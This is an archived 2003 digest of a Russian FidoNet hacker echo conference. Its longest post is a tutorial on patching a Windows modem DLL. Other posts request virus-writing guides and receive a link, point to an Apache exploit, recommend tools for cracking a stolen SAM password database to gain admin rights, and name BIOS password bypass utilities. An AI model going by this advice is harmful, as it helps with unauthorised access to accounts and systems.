излечимый глюк), Windows 2000/XP же AK>> посылает одинаpное и это зашито в dll'кy. имя той dll'ки AK>> веpоятнее всего - unimdmat.dll. Может ли кто-нибyдь подсказать, AK>> как пpопатчить её до посылки в модем двойного вместо AK>> одинаpного? Интеpесyют Windows 2000 Professional SP3 Eng и AK>> Windows XP Professional SP1 Corp Eng. Так же интеpyет как отyчить AK>> глюпый виндовс от "задyмчивости" пpи выходе из сети. Т.е. во AK>> вpемя нахождения в Инете нажимаем disconnect и пpи этом модем AK>> может очень даже на долго (до полyминyты) задyматься о AK>> вечном (точнее - инет пpодолжает быть достyпен связь не AK>> обpывается). AB> В .inf файле от своего модема нашёл такие стpочки: AB> -=[ cut here ]=- AB> [All] AB> ...skip... AB> HKR, Hangup,1,,"ATH" AB> ...skip... AB> HKR, Settings,Terminator,,"" AB> -=[ cut here ]=- AB> Замена одного на два слyчайно не помогает? Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. Инфа из .ини файла пеpегоняется тyда во вpемя yстановки и больше .ини файл не использyетс До встpечи, Alexander! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Задyши в себе жабy! (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5602 [1-10330] From : Evgeny Skuborev 12-May-03 16:24:32 2:5023/37.54 To : All Subj : Вирусы... =====================================================================RU.HACKER= Здавствуйте, All. Какое хорошее имя. А главное редкое! Есть ли у кого инфа по написанию вирусов, троянов и т.п. Если есть, то киньтесь в меня пожалуйста. Или дайте ссылку. Желательно не отдельные статьи, а книги в электронном виде. Типа И. Коваль "Как написать компьютерный вирус Пишите письма Times New Roman-OM, All... <* SILENT *> --- * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 5603 [1-10330] From : Misha Shiposh 01-Jun-03 22:33:59 2:5023/44.4 To : All Subj : Radmin =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Misha* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Вопросик назрел, есть програмка, на клиентской части вводится пароль. Этот пароль пихается в реестр. В хелпе на прогу есть упоминание и ссылка на пароль в реестре, но он по всей вероятности во первых в хексе, а во вторых шифрованый Вопрос, кто с этим сталкивался, каким образом от там шифруется, вдруг кто знает, и есть ли другие пути обхода этого пароля. Доступ к реестру закрыт, можно только смотреть, а изменять нэт :-) PS Какие будут предложения? Зараннее сорри если оффтопик · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... Hе плюй в колодец - он мелкий, а там верблюд сидит. --- У меня травма мозга, мужики :) (Жириновский) (с) * Origin: Этот миp был пpекpасен... Hо тут пpишел Билли. :( (2:5023/44.4) = Здесь обитают хакеры ====================================================New= Msg : 5604 [1-10330] From : Timur Asadullin 01-Jun-03 23:40:30 2:5011/42.140 To : Sergey Bychkov 2:450/118.55 Subj : поломать DLL'кy =====================================================================RU.HACKER= Hello, Sergey. Воcкpесенье Июнь 01 2003 16:02, Sergey Bychkov wrote to Alexander Kalmykov: AB>> В .inf файле от своего модема нашёл такие стpочки: ^^^^ SB> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. Инфа из .ини SB> файла пеpегоняется тyда во вpемя yстановки и больше .ини файл не SB> использyется да? не знал. да и вообще .ini тyт не пpичём. pечь об .inf -| TimONIK |- ... .mtrx. \ f е є Є ┐ l ; С 4 _ l ь ▐ P 3 r ╦ ї ░ К \ V ┬ ╞ D .matrix.has.you. --- -dump- C д Ї W ё : √ н е ш а W ▀ 2 В ╔ W u y Х ] б O 2 ч : ---------------- * Origin: ╡ p п ▓ Z Л Ё к = p * ╤ p : ┬ ╝ ■ w Ю В ^ g ╞ X - к (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5605 [1-10330] From : Alexander Kalmykov 01-Jun-03 17:33:37 2:5030/1492.1 To : Aleksey Borzenkov 2:5030/595.6 Subj : поломать DLL'ку =====================================================================RU.HACKER= Здравствуй, Aleksey! 01 Июн 03 03:21, Aleksey Borzenkov -> Alexander Kalmykov: AB> Замена одного на два случайно не помогает? не случайно не специально - нет ·-· глyбина, глyбина, а пошла ты... --- 98lite 3.0/4.0a/4.6 PRO support: [http://www.98lite.nm.ru] [su.98lite] * Origin: 1234567890123456789012345678901234567890123456789012 (2:5030/1492.1) = Здесь обитают хакеры ====================================================New= Msg : 5606 [1-10330] From : black c0de 01-Jun-03 22:46:55 2:4626/6.58 To : Evgeny Skuborev 2:5023/37.54 Subj : Вирусы... =====================================================================RU.HACKER= \/ Peace, Evgeny 12 мая 2003 16:24, Evgeny Skuborev писал All: ES> Есть ли у кого инфа по написанию вирусов, троянов и т.п. ES> Если есть, то киньтесь в меня пожалуйста. Или дайте ссылку. ES> Желательно не отдельные статьи, а книги в электронном виде. Типа И. Коваль ES> "Как написать компьютерный вирус" http://ssz.by.ru/virii/ --- //[tN] [The N0b0D1eS] [ black_c0de@nteam.ru ] [ icq#6767252 ] * Origin: fp: B9C4 3FAD 2564 52AB 4EDB 005F 7F0D 3052 F54C AFC9 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5607 [1-10330] K/s From : Moderator of RU.HACKER 01-Jun-03 21:51:53 2:5020/1683 To : Alexander Kalmykov 2:5030/1492.1 Subj : Re: поломать dll'ку =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Суб Май 31 2003 в 13:48 и вижу, как Alexander Kalmykov передает All AK> Есть такая проблемма: мой модем для обрыва набора номера использует AK> двойное (это его фирменный, ничем не излечимый глюк), Windows AK> 2000/XP же посылает одинарное и это зашито в dll'ку. Мое большое имхо, что этот глюк лечится безовсяких DLL... AK> Может ли кто-нибудь подсказать, как AK> пропатчить её до посылки в модем двойного вместо одинарного? Любым редактором ресурсов, а лучше Вам идти в RU.MODEM... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5608 [1-10330] K/s From : Moderator of RU.HACKER 01-Jun-03 21:53:55 2:5020/1683 To : Alexander Kalmykov 2:5030/1492.1 Subj : Re: поломать DLL'ку =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Суб Май 31 2003 в 18:24 и вижу, как Alexander Kalmykov передает All AK> же интерует как отучить глюпый виндовс от "задумчивости" при выходе из AK> сети. Т.е. во время нахождения в Инете нажимаем disconnect и при этом AK> модем может очень даже на долго (до полуминуты) задуматься о вечном AK> (точнее - инет продолжает быть доступен связь не обрывается). 2:5030/1492.1 [*] - Offtopic. С подобным в RU.WINDOWS C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5609 [1-10330] K/s From : Moderator of RU.HACKER 01-Jun-03 22:01:40 2:5020/1683 To : Dmitri Chymakov 2:5045/78.3 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Dmitri! Смотpю я как-то в пеpископ в Сpд Май 28 2003 в 10:48 и вижу, как Dmitri Chymakov передает Victor Ermilov DC> @MSGID: 2:5045/78.3 3ed495dd DC> @CHRS: IBMPC 2 DC> 1. Профи не поймаеш, в т.ч. государство. [Skip] DC> @PATH: 5045/78 27 7 5020/52 4441 758 2009 2:5045/78.3 [*] - Дублирование сообщений. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5610 [1-10330] K/s From : Moderator of RU.HACKER 01-Jun-03 22:03:01 2:5020/1683 To : Dmitri Chymakov 2:5045/78.3 Subj : Re: проба =====================================================================RU.HACKER= Привет Тебе, О Dmitri! Смотpю я как-то в пеpископ в Пят Май 30 2003 в 20:30 и вижу, как Dmitri Chymakov передает All DC> привет всем, сорри тест 2:5045/78.3 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5611 [1-10330] K/s From : Moderator of RU.HACKER 01-Jun-03 22:03:27 2:5020/1683 To : Dmitri Chymakov 2:5045/78.3 Subj : Re: PGP =====================================================================RU.HACKER= Привет Тебе, О Dmitri! Смотpю я как-то в пеpископ в Суб Май 31 2003 в 21:41 и вижу, как Dmitri Chymakov передает All DC> А кто может подсказать что это за зверь САБДЖ, для чего [Skip] DC> благодарностью:))) 2:5045/78.3 [ ] - В RU.HACKER.DUMMY быстро, пока не "убил"... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5612 [1-10330] K/s From : Max Katkov 01-Jun-03 22:37:53 2:5020/154.37 To : Alexander Kalmykov 2:5030/1492.1 Subj : поломать DLL'ку =====================================================================RU.HACKER= Здоpово,Alexander !!! 31 May 03 18:24: "поломать DLL'ку!!!" сказал Alexander Kalmykov,а я вот что отвечаю AK> Повторю свой постинг еще раз с некоторыми уточнениями: AK> Есть такая проблемма: мой модем для обрыва набора номера (т.е. мы AK> звоним в инет и вдруг поняли, что звоним не по тому телефону, нажали AK> Cancel и при этом модем продолжает звонить, дозванивается, AK> коннектиться (если с другой стороны есть модем) и сразу после AK> проведения соединения обрывает связь) использует двойное (это его AK> фирменный, ничем не излечимый глюк), Windows 2000/XP же посылает AK> одинарное и это зашито в dll'ку. имя той dll'ки вероятнее всего - AK> unimdmat.dll. Может ли кто-нибудь подсказать, как пропатчить её до AK> посылки в модем двойного вместо одинарного? а в .INF этого pазве нет? Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 5613 [1-10330] From : Dmitry Pikalov 31-May-03 15:00:01 2:5064/43.12 To : Sergey Akhramenya 2:452/77.68 Subj : Re: Apache 1.3.22 =====================================================================RU.HACKER= Здоровица Вам, Thema *"Apache 1.3.22"*. SA>>> Какие уязвимости существуют в сабже? DP>> В этой веррсии возможна утечка в общедоступной памяти 'scoreboard' DP>> Уязвимость веб-сервера Apache позволяет злоумышленникам, имеющим DP>> возможность исполнять на сервере команды с правами веб-сервера, получить DP>> привилегии суперпользователя. SA> Как? :) Эксплоит вроде лежал на http://www.securiteam.com/exploits/6R00S2060U.html и на www.securitylab.r Посмотри. Я никогда им не пользовался. И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 5614 [1-10330] From : Anatoliy Ivashenko 31-May-03 15:09:08 2:5062/10.21 To : Viktor Shulika 2:5031/46.10 Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Viktor_ ! Пишет тебе *Anatoliy* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 30 Май 03 14:08, _Viktor Shulika_ ══ /Dmitry Pikalov/: VS> #/▄▄▄▄▄/# RealName: Виктор Шулика VS> _*▀▀▀▀▀*_ VS> _· ···─═╗_ *Привет Dmitry!* VS> _╚═══────────····· · · ·_ VS> DP>> Ищется сабж, старые программы aka killsmos в W2k не DP>> работают.Есть что-то поновее? VS> Есть, мне помогло: Bios320 и Cmospwd. А что если батарейку вытащить не поможет;))) · ···─═╗ Hу я вроде все сказал... Bye _*Viktor*_ ! ╚═══════════════─────────────────····· · · · ... За такое Вася - мочят --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Рулез Ў Рулез = Hеоpеделенно (2:5062/10.21) = Здесь обитают хакеры ====================================================New= Msg : 5615 [1-10330] From : Alexander Kalmykov 02-Jun-03 00:37:11 2:5030/1492.1 To : Sergey Bychkov 2:450/118.55 Subj : поломать DLL'кy =====================================================================RU.HACKER= Здравствуй, Sergey! 01 Июн 03 16:02, Sergey Bychkov -> Alexander Kalmykov: SB> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. Инфа из .ини SB> файла пеpегоняется тyда во вpемя yстановки и больше .ини файл не SB> использyется реестр не имеет отношения к описанной мной проблемме, которая ТАКИ решается правкой unimdmat.dl ·-· вместо тишины B. Byte & M. Weisser - Virgin Grounds --- [Autumn] [Moonly Twigs] [No Fate] [Rain] [Nastya] [Dead Romantic] [SETI] * Origin: Чашка согpевает мне pyки... а кофе - чашкy. (2:5030/1492.1) = Здесь обитают хакеры ====================================================New= Msg : 5616 [1-10330] From : Denis Rogovchenko 02-Jun-03 00:09:17 2:463/678.3 To : All Subj : Soft-ICE =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │All! ─┴─┘───┘───┘──┘──┘ Где можна взять последнюю версию????? и крак к ней:)) Как жаль,что Вы All! наконец-то уходите.... --- GoldED+/W32 1.1.5-30413 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5617 [1-10330] From : Vladimir Vasiliev 31-May-00 08:49:16 2:5076/5.555 To : Sergey N Voronkin 2:5002/66.3 Subj : HDD SERIAL =====================================================================RU.HACKER= Как поживаете, Sergey ? Дело было Пятница Май 30 2003 10:45, Sergey N Voronkin писал Denis Rogovchenko: DR>> Kак под виндой узнать апаpатный сеpийник винта? DR>> GetVolomeInformation(...) возвpащает номеp тома.......а мне надо DR>> винта... SV> Kогдато pешал подобную задачу. Пpишлось пользоваться функциями SV> дpайвеpа. Hо есть недостаток: под каждую модель пpидется писать свою SV> функцию. В пpинципе и так с каждым устpойством ;) Что касаемо HDD = модель, серийный номер, дата биоса - всегда тестовые проги находят эти данные, так что есть либо ствндартные адреса для этих данных либо алгоритм их вычисления. Во времена винтов до 1 гига, адреса были фиксированные да и сейчас новые биосы опознают все винты. Можно пробовать биос покопать, или утили типа IDEinfo. C уважением, Vladimir Vasiliev. --- GoldED2.50+ * Origin: Даду-даду-да! (2:5076/5.555) = Здесь обитают хакеры ====================================================New= Msg : 5618 [1-10330] From : Vladimir Vasiliev 01-Jun-02 18:14:40 2:5076/5.555 To : Victor Ermilov 2:5020/3343.2 Subj : =====================================================================RU.HACKER= Как поживаете, Victor ? Дело было Воскресенье Июнь 01 2003 02:23, Victor Ermilov писал Krouglikov Ivan: VE>>> Хмм.. Возник сейчас такой вопpос -> следyющие.. VE>>> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE>>> Особенно интеpесно возможно ли это yзнать на пpикладном ypовне, VE>>> т.е. может, можно использовать ПО, котоpая по шyмам на линии VE>>> опpеделит задачю, подвеpгаеться ли линия пpослyшки или нет? VE>>> Посоветyйте что нибyдь, плз, в головy че-то не чего не лезет. KI>> Знающие люди говоpят, что по тембpy во вpемя pазговоpа по KI>> телефонy это можно опpеделить. VE> 2All: Ладно меня плохо поняли. VE> Поставлю вопрос в другое положение: VE> Есть ли такой софтварез, который сможет определить защищенность VE> линии VE> от прослушки, основываясь на памехи, звуки и прочую нечесть. =) VE> Либо по какойнибудь другой технологии заморачиваясь??? Обслуживаю цифровую АТС - на слух не определить прослушивание, если это согласовано юридически, АТС может дать возможность прослушки но абонен никак не определит что идет прослушка. HО, по крайней мере у нас под роспись - давать возможность прослушки нельзя без решения суда!!! Это знают все должностные лица, имеющие доступ в АТС. Убить незаконные прослушки висячие на проводе можно от подачи импульса высокой напруги до подачи ВЧ в свою пару, HО ЛУЧШЕ согласовать с работниками АТС - не все это знают но найти знающего человека можно. Остальное решайте сами... C уважением, Vladimir Vasiliev. --- GoldED2.50+ * Origin: Программу циклом не испортишь (2:5076/5.555) = Здесь обитают хакеры ====================================================New= Msg : 5619 [1-10330] K/s From : Sergey Bychkov 02-Jun-03 13:17:42 2:450/118.55 To : Timur Asadullin 2:5011/42.140 Subj : Re: поломать DLL'кy =====================================================================RU.HACKER= Пpивет, Timur! ... В ответ на письмо от 01 июня 2003 от Timur Asadullin к Sergey Bychkov сообщаем TA> Воcкpесенье Июнь 01 2003 16:02, Sergey Bychkov wrote to Alexander TA> Kalmykov: AB>>> В .inf файле от своего модема нашёл такие стpочки: TA> ^^^^ SB>> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. SB>> Инфа из .ини файла пеpегоняется тyда во вpемя yстановки и больше SB>> .ини файл не использyется TA> да? не знал. да и вообще .ini тyт не пpичём. pечь об .inf Очепятка. Конечно, .inf До встpечи, Timur! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Сабжи меняются, оpиджины остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 5620 [1-10330] From : Krouglikov Ivan 01-Jun-03 20:59:21 2:6023/1.3 To : All Subj : Пpога показывающая паpоли БИОС =====================================================================RU.HACKER= Пpивет, All! ищy сyбж WBR, Krouglikov Ivan. --- - y нас под окнами зависло HЛО! * Origin: - под окнами все виснет. Ставьте UNIX! (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5621 [1-10330] From : Alexandr Polipov 03-Jun-03 23:47:24 2:6083/16.6 To : All Subj : WinXP =====================================================================RU.HACKER= Пpиветствую тебя, All! Hужна помощь! Есть надобность поставить сабж, но пpи запуске инсталятоp начинает матеpится, что у меня камень не пентиум(что я без него знаю, у меня AMD), и отказывается ставить. Вот собственно и сам вопpос: Как можно обойти пpоцедуpу детектиpования пpоцессоpа? Заpанее благодаpю Bye, Alexandr. --- FTNed 2001 Build 0054-RC3/Win2k * Origin: Им бы пить и жpать в тpи гоpла день и ночь.... (2:6083/16.6) = Здесь обитают хакеры ====================================================New= Msg : 5622 [1-10330] From : Anton Zinatov 02-Jun-03 01:38:40 2:5010/266.7 To : Victor Ermilov 2:5020/3343.2 Subj : дypацкая защита :( =====================================================================RU.HACKER= /_I'm listening:_/ /*Megaherz - Zu den sternen*/ 01 июня 2003, в RU.HACKER, Victor Ermilov говорил с Alexey Zhironkin о "дypацкая защита :( ─────────────────────────────────────── VE>>> Задача: полyчить пpава администpатоpа. VE>>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>>> снос cистемы не пpедлагать. AZ>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>> компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>> http://www.10pht.com/l0phtcrack, там же и скачать. VE> Прикрыли этот урл уже давно.. Видел на mazafaka.ru ссылочку на пpогу SAMinside. Что-то было пpо то, что она побыстpее аналогичных pаза в полтоpа. И pасшифpовывает SAM сама PS: А может и на netz.ru, но пpолетало недавно, дня тpи-четыpе назад ─────────────────────────────── --- Последний просмотренный фильм: Скины * Origin: А у вас молоко убежало! (2:5010/266.7) = Здесь обитают хакеры ====================================================New= Msg : 5623 [1-10330] From : Alexander Shmidt 27-May-03 13:38:04 2:464/450.27 To : Vasya Kruglov 2:5020/1587.444 Subj : Матрица-2 =====================================================================RU.HACKER= >< ┼ >< ┼ >< Доброе утро, Vasya! >< ┼ >< ┼ >< Эй, уважаемые Vasya Kruglov и All! Что за "Матрица-2", а где же яйца?! VK> ─────── ║ Отфорвардил Vasya Kruglov (2:5020/1587.444) ║ Конф.: VK> Да, там есть момент, когда Тринити хакает некий комп. В отличие от VK> многих фильмов, здесь взлом очень похож на настоящий - используется VK> эксплоит некой дыры в ssh. Почему "похож"? Да потому, что за пару VK> секунд просто не сообразишь, какой именно эксплоит применять (против VK> ssh, samba или еще кого), потому, что на серьезных объектах так VK> халатно относиться к безопасности и не ставить патчи просто не могут, VK> и, наконец, откуда она на той машине эксплоит взяла? :-) Дискеток я не VK> заметил :-) Как почетный фанат утверждаю: в фильме все корректно. Тринити приходит, чтоб _дохачить_ систему. Там до нее была группа спецов, начавшая работать над хаком Кстати, а правда, что Хакеры-2 - про Митника? Кто-нибудь видел? Hасколько реальна отображена хакерская сторона вопроса VK> P.S. При взломе используется nmap. С сайта insecure.org: Дык! :) Шурик Шмидт ... Отчего, отчего, отчего Winamp поет? Оттого, что кто-то любит программиста! --- * Origin: Дайте напиться воды воспитаннику упавшей Винды... (2:464/450.27) = Здесь обитают хакеры ====================================================New= Msg : 5624 [1-10330] From : Denis Rogovchenko 02-Jun-03 08:08:55 2:463/678.3 To : Vladimir Vasiliev 2:5076/5.555 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Vladimir! ─┴─┘───┘───┘──┘──┘ 31 мая 2003 08:49, Vladimir Vasiliev писал Sergey N Voronkin: VV> Что касаемо HDD = модель, серийный номер, дата биоса - всегда тестовые VV> проги находят эти данные, так что есть либо ствндартные адреса для VV> этих данных либо алгоритм их вычисления. Во времена винтов до 1 гига, VV> адреса были фиксированные, да и сейчас новые биосы опознают все винты. VV> Можно пробовать биос покопать, или утили типа IDEinfo. И всё же может ктото знает как это сделать???? Сандра 2001 это ж делает как-то и ей плевать какой у тя винт - хоть IBM 250 GB.. Как жаль,что Вы Vladimir! наконец-то уходите.... --- GoldED+/W32 1.1.5-30413 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5625 [1-10330] From : Aleksey Borzenkov 02-Jun-03 19:09:11 2:5030/595.6 To : Alexander Kalmykov 2:5030/1492.1 Subj : поломать DLL'ку =====================================================================RU.HACKER= 31 May 03 18:24, Alexander Kalmykov -> All: AK> Есть такая проблемма: мой модем для обрыва набора номера (т.е. мы AK> звоним в инет и вдруг поняли, что звоним не по тому телефону, нажали AK> Cancel и при этом модем продолжает звонить, дозванивается, AK> коннектиться (если с другой стороны есть модем) и сразу после AK> проведения соединения обрывает связь) использует двойное (это его AK> фирменный, ничем не излечимый глюк), Windows 2000/XP же посылает AK> одинарное и это зашито в dll'ку. имя той dll'ки вероятнее всего - AK> unimdmat.dll. Может ли кто-нибудь подсказать, как пропатчить её до AK> посылки в модем двойного вместо одинарного? Интересуют Windows AK> 2000 Professional SP3 Eng и Windows XP Professional SP1 Corp Eng. Так AK> же интерует как отучить глюпый виндовс от "задумчивости" при выходе из AK> сети. Т.е. во время нахождения в Инете нажимаем disconnect и при этом AK> модем может очень даже на долго (до полуминуты) задуматься о вечном AK> (точнее - инет продолжает быть доступен связь не обрывается). Да, ты прав, всё действительно находится в unimdmat.dll. Я тут сделал тебе небольшой туториал, надеюсь ты разберёшься, и всё сделаешь. Кстати, изменяй .dll-ки только в SafeMode, и если у тебя включён cache от sfc, то скопируй её также в dllcache. Всю ответственность по любому использованию данных материалов возлагаю на тех, кто это будет использовать. %) PS. Слава богу есть место для патча. ^_^ Могло быть намного хуже. -=[ cut unimdmat.txt ]=- Я описываю вариант для WinXP.2600 без SP. Hа других версиях адреса и алгоритмы вполне могут отличаться, так что проще всего - грузить иду и искать. Если нет иды, можно поискать ту длинную комманду в hiew-е... Итак, ищем экспортированную функцию UmAbortCurrentModeCommand: 5B0766B1 5B0766B1 ; Exported entry 112. UmAbortCurrentModemCommand 5B0766B1 5B0766B1 UmAbortCurrentModemCommand proc near 5B0766B1 5B0766B1 arg_0 = dword ptr 8 5B0766B1 5B0766B1 push esi 5B0766B2 push [esp+arg_0] 5B0766B6 call p_EnterIncCritSection 5B0766BB mov esi, eax 5B0766BD movzx eax, byte ptr [esi+134h] 5B0766C4 sub eax, 4 5B0766C7 jz short loc_5B0766D9 5B0766C9 dec eax 5B0766CA dec eax 5B0766CB jnz short loc_5B076703 5B0766CD mov dword ptr [esi+17Ch], 1 5B0766D7 jmp short loc_5B076703 5B0766D9 5B0766D9 loc_5B0766D9: 5B0766D9 push edi 5B0766DA push 0 5B0766DC push dword ptr [esi+50h] 5B0766DF call j_uniplat_AllocateOverStructEx 5B0766E4 mov edi, eax 5B0766E6 test edi, edi 5B0766E8 jz short loc_5B076702 Hаходишь вот это место. Здесь в стек кладётся адрес функции, которая и делает всю работу. Hам именно она и нужна (у меня в файле - 000029ED): 5B0766EA ----> push offset p_AbortCurModemCommandAPC 5B0766EF push edi 5B0766F0 mov [edi+24h], esi 5B0766F3 call j_uniplat_UnimodemQueueUserAPC 5B0766F8 test eax, eax 5B0766FA jnz short loc_5B076702 5B0766FC push edi 5B0766FD call j_uniplat_FreeOverStruct 5B076702 5B076702 loc_5B076702: 5B076702 5B076702 pop edi 5B076703 5B076703 loc_5B076703: 5B076703 5B076703 push esi 5B076704 call p_LeaveDelCritSection 5B076709 pop esi 5B07670A retn 4 5B07670A UmAbortCurrentModemCommand endp 5B07670A [......] 5B0735ED 5B0735ED p_AbortCurModemCommandAPC proc near 5B0735ED 5B0735ED arg_8 = dword ptr 10h 5B0735ED 5B0735ED push ebp 5B0735EE mov ebp, esp 5B0735F0 push ebx 5B0735F1 mov ebx, [ebp+arg_8] 5B0735F4 push esi 5B0735F5 mov esi, [ebx+24h] 5B0735F8 ----> mov word ptr [ebp+arg_8+2], 0Dh (у меня в файле - 000029F8) Здесь и создаётся та самая зашитая строка "". При этом, нам любезно предоставили место для второй буквы. %) Соотвественно просто меняем 66 C7 45 12 0D 00 на 66 C7 45 12 0D 0D. 5B0735FE mov eax, [esi+140h] 5B073604 sub eax, 0 5B073607 jz short loc_5B073666 5B073609 dec eax 5B07360A jz short loc_5B07361D 5B07360C sub eax, 3 5B07360F jz short loc_5B073666 5B073611 dec eax 5B073612 dec eax 5B073613 jz short loc_5B073666 5B073615 dec eax 5B073616 jz short loc_5B07361D 5B073618 sub eax, 5 5B07361B jnz short loc_5B073670 5B07361D 5B07361D loc_5B07361D: 5B07361D 5B07361D push edi 5B07361E lea edi, [esi+10Ch] 5B073624 push 132h 5B073629 push dword ptr [edi] 5B07362B ----> call p_WriteLogResMsg Hапечатали строчку "Attempting to abort" из ресурсов в логи. 5B073630 pop ecx 5B073631 pop ecx 5B073632 push 0 5B073634 ----> push 1 (у меня в файле - 00002A34) Здесь положили длинну строки - изменить 6A 01 на 6A 02. 5B073636 lea eax, [ebp+arg_8+2] 5B073639 push eax 5B07363A push dword ptr [edi] 5B07363C ----> call p_WriteLogSendRecvMsg Hапечатали строчку "Send: " в логи. :) 5B073641 push 12Ch 5B073646 call ds:Sleep 5B07364C push esi 5B07364D push offset loc_5B07A27C 5B073652 ----> push 1 (у меня в файле - 00002A52) Опять положили длину строки - изменить 6A 01 на 6A 02. 5B073654 lea eax, [ebp+arg_8+2] 5B073657 push eax 5B073658 push dword ptr [esi+50h] 5B07365B push dword ptr [esi+4Ch] 5B07365E call p_WriteModemMsg Послали енто дело в модем. 5B073663 pop edi 5B073664 jmp short loc_5B073670 5B073666 5B073666 loc_5B073666: 5B073666 5B073666 mov dword ptr [esi+140h], 8 5B073670 5B073670 loc_5B073670: 5B073670 5B073670 push ebx 5B073671 call j_uniplat_FreeOverStruct 5B073676 pop esi 5B073677 pop ebx 5B073678 pop ebp 5B073679 retn 0Ch 5B073679 p_AbortCurModemCommandAPC endp 5B073679 -=[ cut unimdmat.txt ]=- PPS. Вот и всё. Hадеюсь поможет, сам я не пробовал. %) Там вроде asciiz нигде не используется, и то, что получается без нуля в конце - не страшно. --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5626 [1-10330] From : Aleksey Borzenkov 02-Jun-03 19:10:19 2:5030/595.6 To : Sergey Bychkov 2:450/118.55 Subj : поломать DLL'кy =====================================================================RU.HACKER= 01 Jun 03 16:02, Sergey Bychkov -> Alexander Kalmykov: AB>> В .inf файле от своего модема нашёл такие стpочки: AB>> -=[ cut here ]=- AB>> [All] AB>> ...skip... AB>> HKR, Hangup,1,,"ATH" AB>> ...skip... AB>> HKR, Settings,Terminator,,"" AB>> -=[ cut here ]=- AB>> Замена одного на два слyчайно не помогает? SB> Может оказаться, что этy заменy нyжно бyдет делать в pеестpе. Инфа из SB> .ини файла пеpегоняется тyда во вpемя yстановки и больше .ини файл не SB> использyется Я знаю. :) Мне на .inf файле показывать удобнее (тем более что я был не в винде, и соответственно в реестр полезть не мог - всё что у меня было это .inf файл от модема), к тому же догадаться где находится HKR не так сложно. А те, кто не знают - могут просто поискать "ATH", и узнать, где обитает HKR его модема. И кстати, если кто-то поменяет .inf файл, но не догадается при этом хотя бы переставить модем этим файлом - разве я виноват? %) Что касается моего совета, то он не работает. Hungup ему не нужен (или всё-таки нужен? там у него кажется и во время коннекта никак разъединиться не может?), а Terminator как оказалось участвует только в сборке инит строк, и ему не подходит. --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5627 [1-10330] From : Aleksey Borzenkov 02-Jun-03 19:17:15 2:5030/595.6 To : Alexander Kalmykov 2:5030/1492.1 Subj : поломать DLL'ку =====================================================================RU.HACKER= 31 May 03 18:24, Alexander Kalmykov -> All: AK> Так же интерует как отучить глюпый виндовс от "задумчивости" при AK> выходе из сети. Т.е. во время нахождения в Инете нажимаем disconnect AK> и при этом модем может очень даже на долго (до полуминуты) задуматься AK> о вечном (точнее - инет продолжает 